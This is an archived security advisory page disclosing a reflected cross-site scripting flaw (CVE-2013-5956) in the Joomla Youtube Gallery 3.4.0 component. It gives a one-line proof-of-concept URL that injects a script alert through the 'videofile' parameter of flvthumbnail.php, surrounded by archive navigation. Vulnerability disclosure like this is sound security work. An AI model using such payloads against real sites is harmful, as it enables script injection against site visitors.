Joomla Youtube Gallery 3.4.0 Cross Site Scripting

Joomla Youtube Gallery 3.4.0 Cross Site Scripting: Posted Mar 15, 2014; Authored by Mahmoud Ghorbanzadeh; Joomla Youtube Gallery component version 3.4.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2013-5956; SHA-256 | 4ef864392ba2fff744ec53b5240a1d326acb8b8a96317ac7215fffa4ce7a1cbd; Download | Favorite | View

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

Hello,

Cross-site
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web
script or HTML via the videofile parameter to /includes/flvthumbnail.php.

POC:
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script>

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 62 files
Debian 22 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Jann Horn 3 files
Alter Prime 3 files
Andrey Stoykov 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,169)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,011)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,372)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,008)
UNIX (9,481)
UnixWare (188)
Windows (6,785)
Other

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

Share This

Joomla Youtube Gallery 3.4.0 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems